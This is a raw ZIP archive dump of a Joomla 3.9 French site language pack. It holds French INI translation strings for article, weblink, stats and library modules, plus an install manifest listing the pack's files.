PK!��nYzz(fr-FR/fr-FR.mod_articles_popular.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_ARTICLES_POPULAR="Articles les plus consultés"
MOD_POPULAR_XML_DESCRIPTION="Le module 'mod_articles_popular' affiche la liste des articles publiés les plus populaires déterminés par leur nombre d'affichages."
MOD_ARTICLES_POPULAR_LAYOUT_DEFAULT="Défaut"

PK!g6��ww)fr-FR/fr-FR.mod_articles_category.sys.ininu&1i�; @date        2015-01-31
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_ARTICLES_CATEGORY="Articles - Catégorie"
MOD_ARTICLES_CATEGORY_XML_DESCRIPTION="Le module 'mod_articles_category' affiche une liste d'article d'une ou de plusieurs catégories selon les paramètres choisis."
MOD_ARTICLES_CATEGORY_LAYOUT_DEFAULT="Défaut"

PK!��ܨ�fr-FR/install.xmlnu&1i�<?xml version="1.0" encoding="UTF-8"?>
<extension version="3.9" client="site" type="language" method="upgrade">
	<name>French (France)</name>
	<tag>fr-FR</tag>
	<version>3.9.24.1</version>
	<creationDate>2020-12-17</creationDate>
	<author>French translation team : joomla.fr</author>
	<authorEmail>traduction@joomla.fr</authorEmail>
	<authorUrl>http://joomla.fr</authorUrl>
	<copyright>Copyright (C) 2005 - 2020 Joomla.fr and Open Source Matters, Inc. All rights reserved.</copyright>
	<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
	<description>fr-FR - Site language</description>
	<files>
		<filename>fr-FR.ini</filename>
		<filename>fr-FR.com_ajax.ini</filename>
		<filename>fr-FR.com_config.ini</filename>
		<filename>fr-FR.com_contact.ini</filename>
		<filename>fr-FR.com_content.ini</filename>
		<filename>fr-FR.com_finder.ini</filename>
		<filename>fr-FR.com_mailto.ini</filename>
		<filename>fr-FR.com_media.ini</filename>
		<filename>fr-FR.com_messages.ini</filename>
		<filename>fr-FR.com_newsfeeds.ini</filename>
		<filename>fr-FR.com_privacy.ini</filename>
		<filename>fr-FR.com_search.ini</filename>
		<filename>fr-FR.com_tags.ini</filename>
		<filename>fr-FR.com_users.ini</filename>
		<filename>fr-FR.com_weblinks.ini</filename>
		<filename>fr-FR.com_wrapper.ini</filename>
		<filename>fr-FR.files_joomla.sys.ini</filename>
		<filename>fr-FR.finder_cli.ini</filename>
		<filename>fr-FR.lib_fof.ini</filename>
		<filename>fr-FR.lib_fof.sys.ini</filename>
		<filename>fr-FR.lib_idna_convert.sys.ini</filename>
		<filename>fr-FR.lib_joomla.ini</filename>
		<filename>fr-FR.lib_joomla.sys.ini</filename>
		<filename>fr-FR.lib_phpass.sys.ini</filename>
		<filename>fr-FR.lib_phputf8.sys.ini</filename>
		<filename>fr-FR.lib_simplepie.sys.ini</filename>
		<filename>fr-FR.mod_articles_archive.ini</filename>
		<filename>fr-FR.mod_articles_archive.sys.ini</filename>
		<filename>fr-FR.mod_articles_categories.ini</filename>
		<filename>fr-FR.mod_articles_categories.sys.ini</filename>
		<filename>fr-FR.mod_articles_category.ini</filename>
		<filename>fr-FR.mod_articles_category.sys.ini</filename>
		<filename>fr-FR.mod_articles_latest.ini</filename>
		<filename>fr-FR.mod_articles_latest.sys.ini</filename>
		<filename>fr-FR.mod_articles_news.ini</filename>
		<filename>fr-FR.mod_articles_news.sys.ini</filename>
		<filename>fr-FR.mod_articles_popular.ini</filename>
		<filename>fr-FR.mod_articles_popular.sys.ini</filename>
		<filename>fr-FR.mod_banners.ini</filename>
		<filename>fr-FR.mod_banners.sys.ini</filename>
		<filename>fr-FR.mod_breadcrumbs.ini</filename>
		<filename>fr-FR.mod_breadcrumbs.sys.ini</filename>
		<filename>fr-FR.mod_custom.ini</filename>
		<filename>fr-FR.mod_custom.sys.ini</filename>
		<filename>fr-FR.mod_feed.ini</filename>
		<filename>fr-FR.mod_feed.sys.ini</filename>
		<filename>fr-FR.mod_finder.ini</filename>
		<filename>fr-FR.mod_finder.sys.ini</filename>
		<filename>fr-FR.mod_footer.ini</filename>
		<filename>fr-FR.mod_footer.sys.ini</filename>
		<filename>fr-FR.mod_languages.ini</filename>
		<filename>fr-FR.mod_languages.sys.ini</filename>
		<filename>fr-FR.mod_login.ini</filename>
		<filename>fr-FR.mod_login.sys.ini</filename>
		<filename>fr-FR.mod_menu.ini</filename>
		<filename>fr-FR.mod_menu.sys.ini</filename>
		<filename>fr-FR.mod_random_image.ini</filename>
		<filename>fr-FR.mod_random_image.sys.ini</filename>
		<filename>fr-FR.mod_related_items.ini</filename>
		<filename>fr-FR.mod_related_items.sys.ini</filename>
		<filename>fr-FR.mod_search.ini</filename>
		<filename>fr-FR.mod_search.sys.ini</filename>
		<filename>fr-FR.mod_stats.ini</filename>
		<filename>fr-FR.mod_stats.sys.ini</filename>
		<filename>fr-FR.mod_syndicate.ini</filename>
		<filename>fr-FR.mod_syndicate.sys.ini</filename>
		<filename>fr-FR.mod_tags_popular.ini</filename>
		<filename>fr-FR.mod_tags_popular.sys.ini</filename>
		<filename>fr-FR.mod_tags_similar.ini</filename>
		<filename>fr-FR.mod_tags_similar.sys.ini</filename>
		<filename>fr-FR.mod_users_latest.ini</filename>
		<filename>fr-FR.mod_users_latest.sys.ini</filename>
		<filename>fr-FR.mod_weblinks.ini</filename>
		<filename>fr-FR.mod_weblinks.sys.ini</filename>
		<filename>fr-FR.mod_whosonline.ini</filename>
		<filename>fr-FR.mod_whosonline.sys.ini</filename>
		<filename>fr-FR.mod_wrapper.ini</filename>
		<filename>fr-FR.mod_wrapper.sys.ini</filename>
		<filename>fr-FR.tpl_beez3.ini</filename>
		<filename>fr-FR.tpl_beez3.sys.ini</filename>
		<filename>fr-FR.tpl_protostar.ini</filename>
		<filename>fr-FR.tpl_protostar.sys.ini</filename>
		<filename>fr-FR.localise.php</filename>
		<filename file="meta">install.xml</filename>
		<filename file="meta">fr-FR.xml</filename>
		<filename>index.html</filename>
	</files>
	<params />
</extension>
PK!�6�fr-FR/index.htmlnu&1i�<!DOCTYPE html><title></title>PK!�u���
�
fr-FR/fr-FR.com_weblinks.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_WEBLINKS_CAPTCHA_LABEL="Captcha"
COM_WEBLINKS_CAPTCHA_DESC="Veuillez compléter le contrôle de sécurité."
COM_WEBLINKS_CONTENT_TYPE_WEBLINK="Lien Web"
COM_WEBLINKS_CONTENT_TYPE_CATEGORY="Catégorie de liens web"
COM_WEBLINKS_DEFAULT_PAGE_TITLE="Liens web"
COM_WEBLINKS_EDIT="Modifier un lien web"
COM_WEBLINKS_ERR_TABLES_NAME="Il existe déjà un lien web du même nom dans cette catégorie. Veuillez réessayer."
COM_WEBLINKS_ERR_TABLES_PROVIDE_URL="Veuillez fournir une URL valide"
COM_WEBLINKS_ERR_TABLES_TITLE="Votre lien web doit comporter un titre."
COM_WEBLINKS_ERROR_CATEGORY_NOT_FOUND="La catégorie de liens web n'a pas été trouvée"
COM_WEBLINKS_ERROR_UNIQUE_ALIAS="Un autre lien web de cette catégorie a le même alias (rappel : ce lien web peut se trouver dans la corbeille)."
COM_WEBLINKS_ERROR_WEBLINK_NOT_FOUND="Le lien web n'a pas été trouvé"
COM_WEBLINKS_ERROR_WEBLINK_URL_INVALID="L'URL du lien est invalide"
COM_WEBLINKS_FIELD_ALIAS_DESC="L'alias est pour usage interne uniquement. Laissez ce champ vide et Joomla le remplacera par une valeur par défaut du titre. Il doit être unique pour chaque lien web dans la même catégorie."
COM_WEBLINKS_FIELD_CATEGORY_DESC="Vous devez sélectionner une catégorie."
COM_WEBLINKS_FIELD_DESCRIPTION_DESC="Vous devez saisir une description pour votre lien web"
COM_WEBLINKS_FILTER_LABEL="Champ de filtre"
COM_WEBLINKS_FILTER_SEARCH_DESC="Filtre de recherche dans les liens web."
COM_WEBLINKS_FIELD_TITLE_DESC="Votre lien web doit avoir un titre."
COM_WEBLINKS_FIELD_URL_DESC="Vous devez saisir une URL."
COM_WEBLINKS_FIELD_URL_LABEL="URL"
COM_WEBLINKS_FORM_CREATE_WEBLINK="Proposer un lien web"
COM_WEBLINKS_GRID_TITLE="Titre"
COM_WEBLINKS_LINK="Lien web"
COM_WEBLINKS_NAME="Nom"
COM_WEBLINKS_NO_WEBLINKS="Il n'y a pas de liens web dans cette catégorie"
COM_WEBLINKS_NUM="Nombre de liens :"
COM_WEBLINKS_NUM_ITEMS="Liens dans les catégories"
COM_WEBLINKS_FORM_EDIT_WEBLINK="Modifier un lien web"
COM_WEBLINKS_FORM_SUBMIT_WEBLINK="Proposer un lien web"
COM_WEBLINKS_SAVE_SUCCESS="Lien web enregistré."
COM_WEBLINKS_SUBMIT_SAVE_SUCCESS="Lien web proposé."
COM_WEBLINKS_WEB_LINKS="Liens internet"
JGLOBAL_NEWITEMSLAST_DESC="Les nouveaux liens web sont placés par défaut en dernière position. Leur position peut être modifiée après enregistrement."
PK!t�L���fr-FR/fr-FR.com_content.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


COM_CONTENT_ACCESS_DELETE_DESC="Droit de suppression de cet article."
COM_CONTENT_ACCESS_EDIT_DESC="Droit de modification de cet article."
COM_CONTENT_ACCESS_EDITSTATE_DESC="Droit de modification du statut de cet article."
COM_CONTENT_ARTICLE_CONTENT="Contenu"
COM_CONTENT_ARTICLE_HITS="Affichages : %s"
COM_CONTENT_ARTICLE_INFO="Détails"
COM_CONTENT_ARTICLE_VOTE_FAILURE="Vous avez déjà voté pour cet article aujourd'hui"
COM_CONTENT_ARTICLE_VOTE_SUCCESS="Merci d'avoir voté pour cet article."
COM_CONTENT_AUTHOR_FILTER_LABEL="Filtrer par auteur"
COM_CONTENT_CAPTCHA_DESC="Merci de compléter la vérification de sécurité."
COM_CONTENT_CAPTCHA_LABEL="Captcha"
COM_CONTENT_CATEGORY="Catégorie : %s"
COM_CONTENT_CATEGORY_LIST_TABLE_CAPTION="Liste des articles dans la catégorie %s"
COM_CONTENT_CHECKED_OUT_BY="Verrouillé par %s"
COM_CONTENT_CONTENT_TYPE_ARTICLE="Article"
COM_CONTENT_CONTENT_TYPE_CATEGORY="Catégorie d'article"
COM_CONTENT_CREATE_ARTICLE="Proposer un article"
COM_CONTENT_CREATED_DATE="Date de création"
COM_CONTENT_CREATED_DATE_ON="Création : %s"
COM_CONTENT_EDIT_ITEM="Modifier l'article"
COM_CONTENT_ERROR_ARTICLE_NOT_FOUND="Article introuvable"
COM_CONTENT_ERROR_LOGIN_TO_VIEW_ARTICLE="Veuillez vous connecter pour lire l'article"
COM_CONTENT_ERROR_PARENT_CATEGORY_NOT_FOUND="La catégorie parente n'a pas été trouvée"
COM_CONTENT_FEED_READMORE="Lire la suite..."
COM_CONTENT_FIELD_FULL_DESC="Image de l'introduction de l'article "
COM_CONTENT_FIELD_FULL_LABEL="Image de l'article complet"
COM_CONTENT_FIELD_IMAGE_ALT_DESC="Texte alternatif utilisé pour les utilisateurs qui n'ont pas accès aux images."
COM_CONTENT_FIELD_IMAGE_ALT_LABEL="Alt texte"
COM_CONTENT_FIELD_IMAGE_CAPTION_DESC="Légende attachée à l'image"
COM_CONTENT_FIELD_IMAGE_CAPTION_LABEL="Légende"
COM_CONTENT_FIELD_IMAGE_DESC="L'image à afficher"
COM_CONTENT_FIELD_INTRO_DESC="Image pour le texte d'introduction en affichage 'Blog' et 'En vedette'."
COM_CONTENT_FIELD_INTRO_LABEL="Image d'intro "
COM_CONTENT_FIELD_NOTE_DESC="Note optionnelle à afficher dans la liste d'articles."
COM_CONTENT_FIELD_NOTE_LABEL="Note"
COM_CONTENT_FIELD_URL_DESC="Lien vers lequel les utilisateurs seront redirigés."
COM_CONTENT_FIELD_URL_LINK_TEXT_DESC="Texte à afficher pour ce lien"
COM_CONTENT_FIELD_URL_LINK_TEXT_LABEL="Texte du lien"
COM_CONTENT_FIELD_URLA_LABEL="Lien A"
COM_CONTENT_FIELD_URLA_LINK_TEXT_LABEL="Texte du lien A"
COM_CONTENT_FIELD_URLB_LABEL="Lien B"
COM_CONTENT_FIELD_URLB_LINK_TEXT_LABEL="Texte du lien B"
COM_CONTENT_FIELD_URLC_LABEL="Lien C"
COM_CONTENT_FIELD_URLC_LINK_TEXT_LABEL="Texte du lien C"
COM_CONTENT_FILTER_SEARCH_DESC="Filtre de recherche sur les articles"
COM_CONTENT_FLOAT_DESC="Contrôles du placement de l'image"
COM_CONTENT_FLOAT_FULLTEXT_LABEL="Image en texte complet"
COM_CONTENT_FLOAT_INTRO_LABEL="Image en texte d'intro"
COM_CONTENT_FLOAT_LABEL="Position de l'image"
COM_CONTENT_FORM_EDIT_ARTICLE="Modifier un article"
COM_CONTENT_FORM_FILTER_LEGEND="Filtres"
COM_CONTENT_FORM_FILTER_SUBMIT="Filtre"
COM_CONTENT_HEADING_TITLE="Titre"
COM_CONTENT_HITS_FILTER_LABEL="Filtrer par clics"
COM_CONTENT_IMAGES_AND_URLS="Images et liens"
COM_CONTENT_INTROTEXT="L'article doit contenir du texte"
COM_CONTENT_INVALID_RATING="Évaluation d'article : évaluation non valide : %s"
COM_CONTENT_LAST_UPDATED="Mis à jour : %s"
COM_CONTENT_LEFT="Gauche"
COM_CONTENT_METADATA="Métadonnées"
COM_CONTENT_MODAL_FILTER_SEARCH_DESC="Recherche sur titre ou alias. Préfixe avec ID: ou AUTHOR: recherche l'ID ou l'auteur de l'article."
COM_CONTENT_MODAL_FILTER_SEARCH_LABEL="Recherche articles"
COM_CONTENT_MODIFIED_DATE="Date de modification"
COM_CONTENT_MONTH="Mois"
COM_CONTENT_MORE_ARTICLES="Plus d'articles..."
COM_CONTENT_NEW_ARTICLE="Nouvel article"
COM_CONTENT_NO_ARTICLES="Il n'y a aucun article dans cette catégorie. Si des sous-catégories sont affichées sur cette page, elles peuvent contenir des articles."
COM_CONTENT_NONE="Aucun"
COM_CONTENT_NUM_ITEMS="Nombre d'articles :"
COM_CONTENT_NUM_ITEMS_TIP="Nombre d'articles"
COM_CONTENT_ON_NEW_CONTENT="Un nouvel article a été proposé par '%1$s', intitulé '%2$s'."
COM_CONTENT_ORDERING="Classement :<br />Les nouveaux articles sont positionnés par défaut en début de liste de la Catégorie. Le classement peut être modifié depuis l'administration du site."
COM_CONTENT_PAGEBREAK_DOC_TITLE="Saut de page"
COM_CONTENT_PAGEBREAK_INSERT_BUTTON="Insérer un saut de page"
COM_CONTENT_PAGEBREAK_TITLE="Titre de la page :"
COM_CONTENT_PAGEBREAK_TOC="Alias du sommaire:"
COM_CONTENT_PARENT="Catégorie parente: %s"
COM_CONTENT_PUBLISHED_DATE="Date de publication"
COM_CONTENT_PUBLISHED_DATE_ON="Publication : %s"
COM_CONTENT_PUBLISHING="Publication"
COM_CONTENT_RATINGS="Évaluation"
COM_CONTENT_RATINGS_COUNT="Évaluation : %s"
COM_CONTENT_READ_MORE="Lire la suite&nbsp;: "
COM_CONTENT_READ_MORE_TITLE="Lire la suite..."
COM_CONTENT_REGISTER_TO_READ_MORE="Veuillez vous identifier ou vous inscrire pour lire la suite..."
COM_CONTENT_RIGHT="Droite"
COM_CONTENT_SAVE_SUCCESS="Article enregistré."
COM_CONTENT_SAVE_WARNING="L'alias existait déjà, un chiffre a donc été ajouté à la fin. Pour changer l'alias, modifier à nouveau l'article."
COM_CONTENT_SELECT_AN_ARTICLE="Sélectionnez un article"
COM_CONTENT_SUBMIT_SAVE_SUCCESS="Article proposé."
COM_CONTENT_TITLE_FILTER_LABEL="Filtrer par titres"
COM_CONTENT_VOTES="Vote"
COM_CONTENT_VOTES_COUNT="Vote: %s"
COM_CONTENT_WRITTEN_BY="Écrit par %s"
PK!���]]fr-FR/fr-FR.mod_stats.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_STATS="Statistiques"
MOD_STATS_ARTICLES="Articles"
MOD_STATS_ARTICLES_VIEW_HITS="Compteur d'affichages des articles"
MOD_STATS_CACHING="Mise en cache"
MOD_STATS_FIELD_COUNTER_DESC="Activer/Désactiver l'affichage du compteur de 'clics sur les articles'."
MOD_STATS_FIELD_COUNTER_LABEL="Compteur de clics"
MOD_STATS_FIELD_INCREASECOUNTER_DESC="Spécifiez la valeur initiale du compteur depuis laquelle se fera l'incrémentation des clics."
MOD_STATS_FIELD_INCREASECOUNTER_LABEL="Valeur initiale du compteur"
MOD_STATS_FIELD_SERVERINFO_DESC="Activer/Désactiver l'affichage des informations sur le serveur du site."
MOD_STATS_FIELD_SERVERINFO_LABEL="Informations serveur"
MOD_STATS_FIELD_SITEINFO_DESC="Activer/Désactiver l'affichage des informations sur les articles, les liens web et les utilisateurs inscrits sur le site."
MOD_STATS_FIELD_SITEINFO_LABEL="Informations sur le site"
MOD_STATS_GZIP="Gzip"
MOD_STATS_MYSQL="MySQL"
MOD_STATS_OS="OS"
MOD_STATS_PHP="PHP"
MOD_STATS_TIME="Temps"
MOD_STATS_USERS="Visiteurs"
MOD_STATS_WEBLINKS="Liens internet"
MOD_STATS_XML_DESCRIPTION="Le module 'mod_stats' affiche des information sur votre serveur ainsi que des statistiques sur les utilisateurs du site et le nombre d'articles dans votre base de données."
PK!�V���fr-FR/fr-FR.lib_fof.ininu&1i�; @package     FrameworkOnFramework
; @date        2015-06-04
; @copyright   Copyright (C) 2010 - 2015 Nicholas K. Dionysopoulos / Akeeba Ltd. All rights reserved.
; @copyright   (C) 2005 - 2017 Joomla.fr [Traduction]
; @license     GNU General Public License version 2, or later
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


LIB_FOF_DOWNLOAD_ERR_COULDNOTDOWNLOADFROMURL="Impossible de télécharger de %s"
LIB_FOF_DOWNLOAD_ERR_COULDNOTWRITELOCALFILE="Le fichier local %s n'est pas ouvert en écriture"
LIB_FOF_DOWNLOAD_ERR_CURL_ERROR="Le téléchargement a échoué : erreur cURL %s: %s"
LIB_FOF_DOWNLOAD_ERR_HTTPERROR="Statut HTTP inattendu %s"
PK!�����$fr-FR/fr-FR.mod_tags_popular.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_TAGS_POPULAR="Tags populaires"
MOD_TAGS_POPULAR_LAYOUT_CLOUD="Nuage"
MOD_TAGS_POPULAR_LAYOUT_DEFAULT="Défaut"
MOD_TAGS_POPULAR_XML_DESCRIPTION="Le module 'Tags populaires' affiche les tags les plus couramment utilisés, dans des délais spécifiques si souhaité."
PK!���5
5
fr-FR/fr-FR.lib_ic_library.ininu&1i�; iC Library
; Copyright (c) 2013-2019 Cyril Rezé (www.joomlic.com). All rights reserved.
; License GNU General Public License version 3 or later <http://www.gnu.org/licenses/gpl.html>
; Note : All ini files need to be saved as UTF-8 - No BOM
;
; SITE                 : lib_ic_library.ini
; Translation Platform : https://www.transifex.com/joomlic/icagenda

; Common boolean values
; Note: YES, NO, TRUE, FALSE are reserved words in INI format.
; Double quotes in the values have to be formatted as "_QQ_"

ICLIB_XML_DESCRIPTION="iC Library est une librarie qui fournit un ensemble de fonctions pour le CMS Joomla! et les extensions JoomliC"

; Warning thumb generator
ICLIB_ERROR_ICTHUMB="Erreur"
ICLIB_ERROR_ICTHUMB_INFO="Impossible de créer les miniatures"
ICLIB_ERROR_ALERT_IMAGE_TOO_LARGE="Votre image <strong>%s</strong> est trop grande. Merci de redimensionner l'image, ou d'étendre la valeur memory_limit de votre serveur."
ICLIB_ERROR_IMAGE_TOO_LARGE="Impossible de générer les miniatures. Image trop grande."
ICLIB_ERROR_MIME_TYPE="Erreur de type MIME !!!"
ICLIB_ERROR_MIME_TYPE_INFO="L'extension <i>%s</i> n'est pas correcte, car le type MIME de votre fichier est <i>%s</i>."
ICLIB_ERROR_MIME_TYPE_NO_THUMBNAIL="Les miniatures ne peuvent pas être créées."
ICLIB_INVALID_PICTURE_LINK="Lien de l'image non-valide!"
ICLIB_NOT_AUTHORIZED_IMAGE_TYPE="Format d'image non permis!"
ICLIB_NOT_AUTHORIZED_IMAGE_TYPE_INFO="La création des miniatures est compatible avec les formats suivants: jpg, jpeg, png, gif et bmp."
ICLIB_PHP_ERROR_FOPEN="Le paramètre PHP allow_url_fopen est désactivé. Ce paramètre doit être activé sur votre serveur pour permettre la copie d'images distantes (URL). Dans le cas contraire, les miniatures ne pourront pas être créées à partir de l'url d'une image."
ICLIB_PHP_ERROR_FOPEN_COPY_BMP="Le paramètre PHP allow_url_fopen n'est pas activé sur votre serveur!"
ICLIB_PHP_ERROR_FOPEN_COPY_BMP_INFO="Ce paramètre doit être activé pour permettre la création de miniatures à partir de url d'une image bmp."

; PHP config error message
ICLIB_YOUR_PHP_VERSION_IS="Votre version php est %s."
ICLIB_PHP_VERSION_JOOMLA_RECOMMENDED="La version PHP recommandée par Joomla est %s"
ICLIB_PHP_VERSION_ICAGENDA_RECOMMENDATION="Nous vous recommandons fortement de mettre à jour votre version PHP dans la mesure du possible, afin de prévenir d'éventuels bogues, erreurs, ou incompatibilités qui pourraient survenir dans les versions futures d'iCagenda."
ICLIB_PHP_ERROR_GD="Il semblerait que la librairie GD n'est pas installée sur votre serveur! Ce paramètre doit être activé pour que le générateur de miniatures puisse fonctionner."

; Upload image file type control
IC_LIBRARY_UPLOAD_NOT_SUPPORTED="Téléchargement de fichiers non pris en charge!"
IC_LIBRARY_UPLOAD_INVALID_FILE_TYPE_ALERT="Type de fichier non-valide:"
IC_LIBRARY_UPLOAD_INVALID_SIZE="Le fichier %s fait %s Ko! La taille maximum autorisée est de %s Ko.<br />Veuillez sélectionner un autre fichier, ou réduire la taille de celui-ci avant de le télécharger."
IC_LIBRARY_UPLOAD_INVALID_FILE_TYPE="Le fichier %s a un format non-valide!<br />Vous êtes autorisé à télécharger les types de fichier suivants: %s<br />Veuillez sélectionner un autre fichier, ou convertir celui-ci dans un format accepté avant de le télécharger."
IC_LIBRARY_KILO_BYTES="Ko"
PK!tƒ�
�
!fr-FR/fr-FR.mod_articles_news.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_ARTICLES_NEWS="Flash d'information"
MOD_ARTICLES_NEWS_FIELD_FEATURED_DESC="Afficher ou non les articles mis en vedette."
MOD_ARTICLES_NEWS_FIELD_FEATURED_LABEL="Articles mis en vedette"
MOD_ARTICLES_NEWS_FIELD_CATEGORY_DESC="Sélectionnez la ou les catégories des articles à afficher."
MOD_ARTICLES_NEWS_FIELD_IMAGES_ARTICLE_DESC="Afficher l'image d'intro ou de l'article complet."
MOD_ARTICLES_NEWS_FIELD_IMAGES_ARTICLE_LABEL="Afficher image intro/article complet"
MOD_ARTICLES_NEWS_FIELD_IMAGES_DESC="Affiche les images qui se trouvent dans le texte de l'article."
MOD_ARTICLES_NEWS_FIELD_IMAGES_LABEL="Afficher les images de l'article"
MOD_ARTICLES_NEWS_FIELD_ITEMS_DESC="Définissez par une valeur numérique le nombre d'articles à afficher."
MOD_ARTICLES_NEWS_FIELD_ITEMS_LABEL="Nombre d'articles"
MOD_ARTICLES_NEWS_FIELD_LINKTITLE_DESC="Activer/Désactiver le lien sur les titres vers leur article."
MOD_ARTICLES_NEWS_FIELD_LINKTITLE_LABEL="Lien sur les titres"
MOD_ARTICLES_NEWS_FIELD_ORDERING_DESC="Sélectionnez l'ordre dans lequel vous voulez afficher les résultats de recherche."
MOD_ARTICLES_NEWS_FIELD_ORDERING_LABEL="Ordre de tri"
MOD_ARTICLES_NEWS_FIELD_ORDERING_CREATED_DATE="Date de création"
MOD_ARTICLES_NEWS_FIELD_ORDERING_MODIFIED_DATE="Date de modification"
MOD_ARTICLES_NEWS_FIELD_ORDERING_PUBLISHED_DATE="Date de publication"
MOD_ARTICLES_NEWS_FIELD_ORDERING_ORDERING="Ordre prédéfini"
MOD_ARTICLES_NEWS_FIELD_ORDERING_RANDOM="Ordre aléatoire"
MOD_ARTICLES_NEWS_FIELD_READMORE_DESC="Afficher/Masquer le lien 'Lire la suite...' s'il a été inséré dans l'article."
MOD_ARTICLES_NEWS_FIELD_READMORE_LABEL="Lien 'Lire la suite...'"
MOD_ARTICLES_NEWS_FIELD_SEPARATOR_DESC="Activer/Désactiver l'insertion d'un séparateur après le dernier article."
MOD_ARTICLES_NEWS_FIELD_SEPARATOR_LABEL="Séparateur"
MOD_ARTICLES_NEWS_FIELD_TITLE_DESC="Activer/Désactiver l'affichage du titre des articles."
MOD_ARTICLES_NEWS_FIELD_TITLE_LABEL="Titre des articles"
MOD_ARTICLES_NEWS_FIELD_TRIGGEREVENTS_DESC="Déclenche des 'Events' de plug-ins additionnels pour afficher des contenus supplémentaires du type champs personnalisés ou informations de vote."
MOD_ARTICLES_NEWS_FIELD_TRIGGEREVENTS_LABEL="Déclenche des 'Events' de plug-ins"
MOD_ARTICLES_NEWS_FIELD_SHOWINTROTEXT_DESC="Afficher ou non le texte d'introduction."
MOD_ARTICLES_NEWS_FIELD_SHOWINTROTEXT_LABEL="Afficher le texte d'introduction"
MOD_ARTICLES_NEWS_OPTION_FULLIMAGE="Image de l'article complet"
MOD_ARTICLES_NEWS_OPTION_INTROIMAGE="Image d'intro"
MOD_ARTICLES_NEWS_READMORE="Lire la suite..."
MOD_ARTICLES_NEWS_READMORE_REGISTER="S'inscrire pour lire la suite"
MOD_ARTICLES_NEWS_TITLE_HEADING="Balise du titre"
MOD_ARTICLES_NEWS_TITLE_HEADING_DESCRIPTION="Sélectionnez la balise HTML à appliquer aux titres."
MOD_ARTICLES_NEWS_VALUE_ONLY_SHOW_FEATURED="N'afficher que les articles mis en vedette"
MOD_ARTICLES_NEWS_XML_DESCRIPTION="Le module 'mod_articles_news' affiche un nombre défini d'introductions d'article d'une ou de plusieurs catégories. Si aucune catégorie n'est sélectionnée, toutes les catégories seront utilisées."
PK!$��W��(fr-FR/fr-FR.mod_articles_archive.sys.ininu&1i�; @date        2015-01-31
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_ARTICLES_ARCHIVE="Articles - Archivés"
MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION="Le module 'mod_articles_archive' affiche un calendrier mensuel des articles archivés. Lorsque vous archivez un article, cette liste est automatiquement mise à jour."
MOD_ARTICLES_ARCHIVE_LAYOUT_DEFAULT="Défaut"

PK!"�Ô�fr-FR/fr-FR.mod_custom.sys.ininu&1i�; @date        2015-10-22
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_CUSTOM="Contenu personnalisé"
MOD_CUSTOM_XML_DESCRIPTION="Le module 'mod_custom' permet de créer vos propres modules personnalisés en y intégrant les contenus souhaités à l'aide de l'éditeur, code inclus si les droits de l'éditeur et de Joomla vous le permettent."
MOD_CUSTOM_LAYOUT_DEFAULT="Défaut"

PK!�@�fr-FR/fr-FR.mod_menu.sys.ininu&1i�; @date        2015-01-30
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


MOD_MENU="Menu"
MOD_MENU_XML_DESCRIPTION="Le module 'mod_menu' affiche les liens d'un menu spécifié selon les paramètres choisis."
MOD_MENU_LAYOUT_DEFAULT="Défaut"

PK!�1r��fr-FR/fr-FR.com_search.ininu&1i�; @date        2015-07-20
; @author      Joomla! Project
; @copyright   (C) 2005 - 2020 Open Source Matters. All rights reserved.
; @copyright   (C) 2005 - 2020 Joomla.fr [Traduction]
; @license     GNU General Public License version 2 or later; see LICENSE.txt
; @note        Complete
; @note        Client Site
; @note        All ini files need to be saved as UTF-8


